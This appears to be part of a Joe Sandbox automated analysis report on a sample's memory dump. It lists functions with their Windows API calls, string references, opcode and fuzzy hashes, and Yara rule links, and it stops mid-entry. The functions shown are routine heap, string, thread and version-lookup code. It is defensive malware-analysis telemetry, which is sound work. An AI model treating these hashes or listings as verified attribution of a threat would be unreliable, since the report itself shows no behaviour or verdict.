Opcode ID: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
Instruction ID: 8ad69fc92b526a08bfe7472bb61da84b570d2b31100e81d3d28f3db860eb322d
Opcode Fuzzy Hash: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
Instruction Fuzzy Hash: ED014874202605BFC7159F11ED88ADABB79FF49352310843EE51AC6A60CB35A861CBA8

Function 004057F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

wcsncmp.MSVCRT ref: 00405853
memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
wcsncpy.MSVCRT ref: 004058F9

Strings

$0A, xrefs: 0040580C
$0A, xrefs: 00405819

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: memmovewcsncmpwcsncpy
String ID: $0A$$0A
API String ID: 1452150355-167650565
Opcode ID: 14318413d9adc2e2b942005046f5369366b6e76739e1c09bf8bc34821c1b3a51
Instruction ID: 832c062924e7bef47b33d77ba9c88e4f4304e1b7f9fac3bbf8cf3561daacd64f
Opcode Fuzzy Hash: 14318413d9adc2e2b942005046f5369366b6e76739e1c09bf8bc34821c1b3a51
Instruction Fuzzy Hash: 7131C336904B058BC720BA55888057B77A8EE84384F14893EEC8537382EB799D61CBA9

Function 0040552C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040553B
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A

Strings

RtlGetVersion, xrefs: 00405554
ntdll.dll, xrefs: 00405545

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: RtlGetVersion$ntdll.dll
API String ID: 3137504439-1489217083
Opcode ID: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
Instruction ID: c27d50cfc24873b946f5b5a14a9105dc5d991450749eb0f504377b4d26b5710e
Opcode Fuzzy Hash: 979e6798394419a5d8feb081e21a74f9c3e25225fd5f8554349b136b21278e81
Instruction Fuzzy Hash: 14E0DF31B8461576C6202F75AC0AFCB2AEDCFC6B41B18043AF101F31D5DA38CA418ABD

Function 0040A6C3 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040A72B
HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?,00403C0E), ref: 0040A741
wcscpy.MSVCRT ref: 0040A74C
memset.MSVCRT ref: 0040A77A

Strings

$0A, xrefs: 0040A6FC

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocHeapmemsetwcscpywcslen
String ID: $0A
API String ID: 1807340688-513306843
Opcode ID: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
Instruction ID: e32262bd00c92b68ef8260e1fb7dc13a688965226c4dfc8bf1af71259570edab
Opcode Fuzzy Hash: 0446004259e7087f80f5e9692535c9a3ff9e7738c9dd9ea03abb58d6e7266719
Instruction Fuzzy Hash: 3C214872100B01AFC321AF159881B6BB7F9EF88314F14893FF58563691CB79E8258B1A

Function 0040A460 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
Part of subcall function 0040A54F: HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0

HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A51C

Strings

$0A, xrefs: 0040A507

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: Heap$Free$Alloc
String ID: $0A
API String ID: 3901518246-513306843
Opcode ID: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
Instruction ID: cd652e3bdf182b70a5213d1d771de0a97fad45979f4c99c471b58853275527fc
Opcode Fuzzy Hash: 38ff8db7da0bfef88404013647d5d2cc437161e020f58e3aa9cad386b680b922
Instruction Fuzzy Hash: F4216AB1600716BFD3108F2ADC01B46BBE4FB4C700F41812EB508E76A1DB70E964CB99

Function 0040548C Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02139760), ref: 004054A5
EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA

Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB

LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
String ID:
API String ID: 3708593966-0
Opcode ID: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
Instruction ID: 22802cd27a3f1ed093d1fd342325ad429a5e5b172653039cc62d2cb3277a330b
Opcode Fuzzy Hash: 7d32ff8fa703d6aea88238e8b85a34b2bc4f47d3e9cf465d70c1e07cefa75554
Instruction Fuzzy Hash: AD11C232148214BFC3115F69EC05AD7BBB9EF46752720843AF800972A0EB75A8818B68

Function 0040DFC6 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F

Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028

DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040E048
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040E057

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalSection$FreeHeap$DeleteEnterLeave
String ID:
API String ID: 3171405041-0
Opcode ID: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
Instruction ID: 55e4d48cd168304893741703cb98186ecc41a8d0b28d64f5ed6d9708d3a92668
Opcode Fuzzy Hash: fdf9844f3b1e6b4279b4029fb6c954a1531c20b726c16353b8bda20627decff9
Instruction Fuzzy Hash: 23116A71101611EFC720AF16DC08B97BBB9FF45301F15883EE50AA7AA1C779A855CFA8

Function 0040994F Relevance: 7.5, APIs: 6, Instructions: 31COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(02139760,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040995D
CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409968
CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409973
CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040997E
EnterCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409986
LeaveCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040999A

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CloseHandle$CriticalSection$EnterLeave
String ID:
API String ID: 10009202-0
Opcode ID: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
Instruction ID: e0bc3ded0607a690d6707024abf9d108a6c512657707c309f6689cc3689588ed
Opcode Fuzzy Hash: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
Instruction Fuzzy Hash: 35F0FE32004600ABD3226F25DC08BABB7B5BF91355F15883EE055615B0CB796896DF59

Function 00409698 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
Part of subcall function 0040E900: HeapReAlloc.KERNEL32(02130000,00000000,?,?), ref: 0040E967

GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
wcscmp.MSVCRT ref: 004096C2
memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA

Strings

\\?\, xrefs: 004096BA, 004096D4

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocFileHeapModuleNameValuememmovewcscmp
String ID: \\?\
API String ID: 3734239354-4282027825
Opcode ID: 33c17352ecf2d33e8b842fb82144003de2b1de4302be4aa3bf9866a4b196b950
Instruction ID: 45f2cbb32eb965b059acfe96771e330f3b1ba6a562bb2c4a442859e911d7a588
Opcode Fuzzy Hash: 33c17352ecf2d33e8b842fb82144003de2b1de4302be4aa3bf9866a4b196b950
Instruction Fuzzy Hash: 15F0E2B31002017AC2006777DC89CAB7BACEB853B4750093FF516E2491EA38D82486B8

Function 0040B8B6 Relevance: 6.3, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040B957
memset.MSVCRT ref: 0040B960
memset.MSVCRT ref: 0040B969
memset.MSVCRT ref: 0040B976
memset.MSVCRT ref: 0040B982

Part of subcall function 0040CCB6: memcpy.MSVCRT(?,?,00000040,?,?,?,?,?,?,?,?,?,00000000,?,0040B8F5,?), ref: 0040CD10
Part of subcall function 0040CCB6: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0040B8F5,?), ref: 0040CD5F

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
Instruction ID: 1965f6ec6392bd57460d2593cd94e0dced67690f07481f5a959be489f1b8959c
Opcode Fuzzy Hash: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
Instruction Fuzzy Hash: FD21D6727507083BE524AA29DC86F9F738CDB41708F50063EF241B62C1DA79E54546AD

Function 00405BA0 Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,?), ref: 00405C6A
wcsncpy.MSVCRT ref: 00405CC0

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocHeapwcsncpy
String ID:
API String ID: 2304708654-0
Opcode ID: a90f3be50ee59ad9f9cb2c8344752c2d6c44559da06bb1932963a8c5f4cf1607
Instruction ID: c5f2f283d94cb2b95ca38a154dbf8d05cc6d7144c7ec2ede7a16228095844b4d
Opcode Fuzzy Hash: a90f3be50ee59ad9f9cb2c8344752c2d6c44559da06bb1932963a8c5f4cf1607
Instruction Fuzzy Hash: F751BD34508B059BDB209F28D844A6B77F4FF84348F544A2EFC85A72D0E778E955CB89

Function 00406670 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406696
CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066D0
CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066FF
CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406705

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CharLower
String ID:
API String ID: 1615517891-0
Opcode ID: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
Instruction ID: f3574eb3d9009b883351c62f390b1b458f0f5c76b551c27569f8cb84250b8306
Opcode Fuzzy Hash: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
Instruction Fuzzy Hash: 0E2157796043158BC710EF5D9C40077B3A0EF80765F86887BFC85A3380DA39EE169BA9

Function 00412840 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D738,00000000), ref: 00412874
malloc.MSVCRT ref: 00412884
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 004128A1
malloc.MSVCRT ref: 004128B6

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
Instruction ID: e0c8a2120d9564889d2f3113141632f921e3b611a2b6a27c47ae7c2ad602c93a
Opcode Fuzzy Hash: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
Instruction Fuzzy Hash: 9E01453B34130127E3206699AC12FB73B59CB81B95F19017AFB009E2C0D6F3A80082B9

Function 004128E0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412911
malloc.MSVCRT ref: 00412921
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041293B
malloc.MSVCRT ref: 00412950

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
Instruction ID: 3026177615c0ccb99804f522c9f73c57bab6efbcd972e36018b7209c0027a648
Opcode Fuzzy Hash: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
Instruction Fuzzy Hash: AB01F57734534127E3205699AD42FA77B59CB81BA5F19007AFB01AE2C0DAF7681086B8

Function 0040AFEC Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderLocation.SHELL32(00000000,02139760,00000000,00000000,00000000,00000000,00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?), ref: 0040AFFE
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040B00F
wcslen.MSVCRT ref: 0040B01A
CoTaskMemFree.OLE32(00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000), ref: 0040B038

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: FolderFreeFromListLocationPathTaskwcslen
String ID:
API String ID: 4012708801-0
Opcode ID: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
Instruction ID: ea6acf64d2064cc2033e367344890d06019be10827a432285197bb32926cdf71
Opcode Fuzzy Hash: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
Instruction Fuzzy Hash: BBF08136500615BAC7205F6ADC0DDAB7B7CEF15BA07404226F805E6260E7319910D7E8

Function 00405430 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON

Download Yara Rule

APIs

Part of subcall function 004053E4: EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 004053EF
Part of subcall function 004053E4: LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405422

TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405440
EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040544C
CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040546C

Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB

LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405480

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
String ID:
API String ID: 85618057-0
Opcode ID: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
Instruction ID: 2660d4446155f5fb089545407d2c8513ff3ad75f9eb032afb91e50ebd33cab77
Opcode Fuzzy Hash: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
Instruction Fuzzy Hash: 05F0E233404610FBC6205B619C49EE77779EF55767724883FF94172291CB386841CE6D

Function 004099C7 Relevance: 6.0, APIs: 4, Instructions: 26COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5

Memory Dump Source

Source File: 0000000C.00000002.2455095237.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2454475173.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456139794.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456612642.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.2456719445.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

